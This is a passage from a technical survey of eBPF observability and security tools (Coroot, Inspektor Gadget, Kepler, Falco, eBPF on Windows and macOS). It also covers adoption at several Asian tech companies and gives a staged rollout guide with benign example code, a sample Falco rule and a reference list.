- "Among queries hitting postgres, SELECT * FROM users WHERE ... is the slowest at p99 200 ms"
- "Frontend node ip-10-0-1-23 is 30% higher CPU than baseline"
All automatic. Nobody built those dashboards. Especially useful for small teams.
Limits
Coroot trades "standard" for "convenience." Its backend is Prometheus + ClickHouse, which is good for data portability, but its data model is custom — so organizations already invested in Datadog or Honeycomb face additional learning.
11. Inspektor Gadget / Kepler / Falco — A Small but Important Trio
Inspektor Gadget (Microsoft, CNCF Sandbox)
Inspektor Gadget is a "collection of eBPF-built k8s debugging tools" sponsored by Microsoft. It runs as a kubectl plugin.
kubectl gadget trace exec # track new processes across the whole cluster
kubectl gadget trace open # which files are being opened
kubectl gadget trace dns # DNS query flows
kubectl gadget snapshot socket # snapshot open sockets on every node
kubectl gadget top file # top file-I/O users
Internally it began as a wrapper around BCC tools and has evolved into its own IG (Inspektor Gadget) framework, CO-RE based.
Kepler (Sustainable Computing)
Kepler (Kubernetes Efficient Power Level Exporter) started in CNCF Sandbox and was promoted to Incubating in 2025. It measures per-container power usage.
The method is clever. It uses CPU counters (RAPL: Running Average Power Limit), disk I/O, and network I/O, attributes them to containers via eBPF, and then a machine-learning model estimates power in watts.
Exposed as Prometheus metrics
kepler_container_joules_total{container_name="myapp"} 12345.6
kepler_container_other_joules_total{...}
These metrics feed Cloud Carbon Footprint calculators that translate to "how many kg of CO2 did this service produce this month." Directly tied to ESG reporting and FinOps.
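The attribution idea can be shown with the simplest possible model: split the node's measured energy in proportion to each container's CPU time. This is a deliberately naive sketch with made-up numbers and a hypothetical `attribute_energy` function; Kepler's real models use more signals than CPU time alone.

```python
def attribute_energy(node_joules, cpu_time_by_container):
    """Split node energy in proportion to each container's CPU time."""
    total = sum(cpu_time_by_container.values())
    if total == 0:
        return {name: 0.0 for name in cpu_time_by_container}
    return {
        name: node_joules * cpu / total
        for name, cpu in cpu_time_by_container.items()
    }


usage = {"myapp": 6.0, "sidecar": 1.5, "batch": 2.5}  # CPU-seconds, hypothetical
print(attribute_energy(1200.0, usage))
```

Dividing the resulting joules by the length of the measurement window gives average watts per container.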
Falco (CNCF Graduated)
Falco became CNCF Graduated in 2024. The essence is "a runtime-security engine that hooks system calls and evaluates rules."
Excerpt of falco_rules.yaml
- rule: Write below etc
  desc: an attempt to write to any file below /etc
  condition: write_etc_common
  output: 'File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname)'
  priority: ERROR
  tags: [filesystem, mitre_persistence]
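Falco's default driver is now the modern eBPF probe (libbpf and CO-RE based). The kernel-module driver remains available for hosts where eBPF is not an option, and the older non-CO-RE eBPF probe is the one being phased out. The official falcosecurity/rules repository ships a maintained default ruleset whose rules are tagged with MITRE ATT&CK tactics.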
Tetragon and Falco are competitors but are often deployed together. Falco has the rich rule library, Tetragon has the strong real-time enforcement.
12. eBPF for Windows / macOS — Beyond Linux
eBPF is no longer a Linux-only technology.
eBPF for Windows (Microsoft)
Microsoft kicked off the eBPF-for-Windows project in 2021. As of 2026, a stable version ships in Windows Server 2025 and Azure has started production use.
Linux-compatible:
- libbpf-compatible API
- The same .o file (mostly) loads on both
- Core types: BPF_PROG_TYPE_XDP, BPF_PROG_TYPE_BIND, BPF_PROG_TYPE_CGROUP_SOCK, ...
Differences:
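- Verifier is PREVAIL, an open-source verifier that grew out of academic research on abstract interpretation (it is not a port of the Linux verifier)
- JIT is based on uBPF, the user-space eBPF runtime from the IO Visor project
- Hook points center on the Windows network stack (NDIS for XDP, the Windows Filtering Platform for bind and socket hooks)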
Azure's security team runs Tetragon-style hooks on Windows VMs, and Cilium's Windows-node support is in progress. Not yet a game-changer, but the perception of "eBPF is Linux-only" is fading fast.
macOS and Apple Silicon
Apple does not officially support eBPF. macOS has kqueue, DTrace, and the Endpoint Security API filling similar roles. That said, since 2025 it has become commonplace to run eBPF tools inside Linux VMs on Apple Silicon (Lima, Tart, OrbStack), and Asahi Linux has solid ARM eBPF support.
There are experimental unofficial ports (mac-bpf, ebpf-darwin), but no production use to speak of. On macOS, the right answer is running eBPF inside a Linux VM.
13. Korean / Japanese Adoption — Toss, Kakao, LINE, Mercari
Toss — Cilium + Hubble + Tetragon as a Company Standard
Toss announced at SLASH 2024 (their developer conference) that their infrastructure is EKS + Cilium based. The main driver was iptables-rule explosion in kube-proxy. After adopting Cilium:
- iptables rules per node dropped from 10,000+ to nearly zero
- Service-discovery latency p99 dropped meaningfully
- Hubble visualized microservice dependencies
- Tetragon does runtime blocking in some security-sensitive domains
The SLASH 2024 talk is publicly available on YouTube.
Kakao — eBPF-Based In-House Tracing
Kakao presented an in-house eBPF-based tracing system at ifkakao 2024. The core is BCC plus a custom collector that auto-captures RPC calls and database queries. They evaluated Pixie but chose to build it in-house.
LINE / LY Corporation
LINE has shared eBPF use cases multiple times on the LINE Engineering blog. They lean on bpftrace heavily for analyzing TCP retransmits in messenger traffic and network-debugging Kafka clusters.
Mercari — Continuous Profiling
Mercari shared on the Mercari Engineering blog in 2024 how they put Grafana Pyroscope (Parca-compatible) into production. They found CPU hotspots across 100+ Go microservices and cut EC2 costs as a result.
Yahoo Japan / LY Corporation
Yahoo! JAPAN has been operating eBPF-based network observability since 2023. A custom collector captures every TCP flow on every node and stores it in ClickHouse.
14. An Adoption Decision Guide — What to Use When
Finally, the practical decision guide. Do not "adopt everything at once" — go stage by stage.
Stage 1 — Do you need network visibility?
Start with **Cilium + Hubble**. Swapping the CNI is the biggest short-term change, but the biggest long-term payoff. If this is a new cluster, just go Cilium.
Stage 2 — You have no APM, or it is too expensive
Install **Beyla** (OTel-friendly) or **Pixie** (in-memory queries) on one cluster. Within a month you will see "which services are slow."
Stage 3 — You need profiling data
Install **Parca** or **Grafana Pyroscope**. For Go / Rust / Java workloads, CPU hotspots become instantly visible. Especially effective on AI infrastructure where CPU and memory are expensive.
Stage 4 — You need runtime security
Start with **Falco** — rich ruleset, easy install. If you genuinely need real-time blocking, add **Tetragon**.
Stage 5 — You debug k8s often
Install **Inspektor Gadget** as a kubectl plugin. `kubectl gadget trace exec` and friends become daily workflow.
Stage 6 — You need resource / power monitoring
**Kepler** for power. **Coroot** for an auto-inferred dashboard.
Stage 7 — Troubleshooting tools
**BCC + bpftrace** should always be installed for on-the-spot debugging over SSH.
Anti-patterns
- **Install every tool**: Resource overhead stacks up and the ops burden grows. Budget roughly 100–500 MB of memory per node for each tool
- **Old kernels without CO-RE**: On Linux below 5.4, upgrading is priority #1
- **Kernels without BTF**: If `/sys/kernel/btf/vmlinux` is missing, you depend on BTFHub
- **Reckless privileged DaemonSets**: Grant CAP_BPF, CAP_PERFMON, and CAP_NET_ADMIN explicitly instead of running fully privileged
- **Turning on auto-blocking too quickly**: A misconfigured Tetragon Sigkill action will kill perfectly healthy processes. Run in alert mode first, validate patterns, then switch to block mode
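The two kernel-related checks are easy to automate before a rollout. A minimal preflight sketch follows; the `preflight` function and its messages are hypothetical, and the 5.4 threshold is simply the one used in the list above.

```python
import os
import re

BTF_PATH = "/sys/kernel/btf/vmlinux"


def kernel_version(release):
    """Parse a release string such as '6.5.0-41-generic' into (6, 5)."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if not match:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(match.group(1)), int(match.group(2))


def preflight(release, btf_present):
    """Return a list of warnings for an eBPF tool rollout on this node."""
    warnings = []
    if kernel_version(release) < (5, 4):
        warnings.append("kernel older than 5.4: upgrade before adopting CO-RE tools")
    if not btf_present:
        warnings.append(f"{BTF_PATH} missing: external BTF (e.g. BTFHub) required")
    return warnings


if __name__ == "__main__":
    # On a Linux node this inspects the running kernel.
    print(preflight(os.uname().release, os.path.exists(BTF_PATH)))
```

Run it on one node of each node pool; an empty list means neither of the two kernel anti-patterns applies there.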
Closing — Why eBPF Became the Default Infrastructure Tool
eBPF's explosive growth has clear reasons:
1. **CO-RE made ops easy**: No kernel headers, no compilers required
2. **Safety**: The isolation the verifier guarantees is something kernel modules never could
3. **Performance**: A simple kprobe or tracepoint program typically adds on the order of tens to hundreds of nanoseconds per event, cheap enough to leave on in production (uprobes cost more, since each hit traps into the kernel)
4. **Standardization**: OpenTelemetry converged the data model, CNCF validates the tools
5. **Polyglot**: A single agent observes Go, Rust, C++, Python, and Java
An infrastructure engineer in 2026 not knowing eBPF is like an infrastructure engineer in 2016 not knowing Docker. Start by reading one book (Liz Rice's "Learning eBPF" or Brendan Gregg's "BPF Performance Tools"), then drop Cilium + Hubble + Beyla onto one cluster.
> "We instrumented production with eBPF and discovered three latency issues that had been there for two years. We never had to add a single log line." — Lyft Engineering, 2024
References
- [eBPF official site](https://ebpf.io/)
- [eBPF Foundation](https://ebpf.foundation/)
- [Linux Kernel BPF docs](https://docs.kernel.org/bpf/)
- [libbpf on GitHub](https://github.com/libbpf/libbpf)
- [bpftool on GitHub](https://github.com/libbpf/bpftool)
- [CO-RE guide — Andrii Nakryiko's blog](https://nakryiko.com/posts/bpf-portability-and-co-re/)
- [Liz Rice — Learning eBPF (O'Reilly, 2023)](https://www.oreilly.com/library/view/learning-ebpf/9781098135119/)
- [Brendan Gregg — BPF Performance Tools (Addison-Wesley, 2019)](https://www.brendangregg.com/bpf-performance-tools-book.html)
- [Brendan Gregg — Systems Performance, 2nd ed.](https://www.brendangregg.com/systems-performance-2nd-edition-book.html)
- [Pixie](https://px.dev/)
- [Pixie on GitHub](https://github.com/pixie-io/pixie)
- [Parca](https://www.parca.dev/)
- [Polar Signals blog](https://www.polarsignals.com/blog)
- [Cilium](https://cilium.io/)
- [Hubble on GitHub](https://github.com/cilium/hubble)
- [Tetragon](https://tetragon.io/)
- [Tetragon on GitHub](https://github.com/cilium/tetragon)
- [BCC on GitHub](https://github.com/iovisor/bcc)
- [bpftrace on GitHub](https://github.com/bpftrace/bpftrace)
- [OpenTelemetry eBPF on GitHub](https://github.com/open-telemetry/opentelemetry-ebpf)
- [Grafana Beyla](https://grafana.com/oss/beyla-ebpf/)
- [Grafana Beyla on GitHub](https://github.com/grafana/beyla)
- [Grafana Pyroscope](https://grafana.com/oss/pyroscope/)
- [Coroot](https://coroot.com/)
- [Coroot on GitHub](https://github.com/coroot/coroot)
- [Inspektor Gadget](https://www.inspektor-gadget.io/)
- [Kepler](https://sustainable-computing.io/)
- [Kepler on GitHub](https://github.com/sustainable-computing-io/kepler)
- [Falco](https://falco.org/)
- [Falco on GitHub](https://github.com/falcosecurity/falco)
- [eBPF for Windows on GitHub](https://github.com/microsoft/ebpf-for-windows)
- [Asahi Linux](https://asahilinux.org/)
- [sched_ext](https://sched-ext.com/)
- [BTFHub — BTF for old kernels](https://github.com/aquasecurity/btfhub)
- [Toss SLASH 24 — Cilium adoption talk](https://toss.tech/slash-24)
- [LINE Engineering blog](https://engineering.linecorp.com/en)
- [Mercari Engineering blog](https://engineering.mercari.com/en/)
- [eBPF Summit](https://ebpf.io/summit-2024/)
- [CNCF Landscape — Observability and Analysis](https://landscape.cncf.io/)
- [Isovalent (Cisco) blog](https://isovalent.com/blog/)